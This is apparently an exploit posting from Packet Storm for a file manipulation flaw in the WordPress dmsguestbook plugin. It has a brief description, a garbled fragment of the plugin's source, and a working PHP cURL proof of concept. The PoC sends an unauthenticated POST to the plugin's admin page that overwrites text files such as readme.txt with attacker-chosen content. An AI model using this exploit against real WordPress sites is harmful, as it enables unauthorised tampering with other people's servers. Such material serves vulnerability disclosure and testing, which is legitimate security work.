http://packetstormsecurity.com/user/evex/
Author:Evex
Title:
WordPress dmsguestbook Plugin File Manipulation
Description:
wordpress dmsguestbook plugin is vulnerable to a file manipulation security
issue
it allows an unauthenicated attacker to put text into existing text files
only
" . __("saved", "dmsguestbook") . "...",300,800);
} else {message("
" . __("File not found!", "dmsguestbook")
. "",300,800);}
}
*/
$TEXTTOINJECT = 'INPUT TEXT HERE';
$TXTFILE = 'readme.txt'; #
localhost/wp-content/plugins/dmsguestbook/readme.txt
$url = "http://localhost/x/wordpress";
$ch = curl_init();
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,"action=save_advanced_data&file=$TXTFILE&advanced_data=$TEXTTOINJECT");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_URL,$url.'/wp-admin/admin.php?page=dmsguestbook');
curl_exec($ch);
echo "Payload Sent\nUrl: $url/wp-content/plugins/dmsguestbook/readme.txt";
?>